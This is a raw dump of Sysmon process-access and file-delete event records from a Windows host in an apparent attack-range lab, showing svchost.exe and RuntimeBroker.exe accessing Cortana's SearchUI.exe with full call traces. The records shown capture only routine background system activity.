10341000x800000000000000011222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT
4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.922{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=A18CF0E97323D4D42934DBF9CB5FEEBC,SHA256=C351408BE3DA87AF4248C88717B574B4E053DB2BD8C2520AC90CF2D0923085AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.890{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 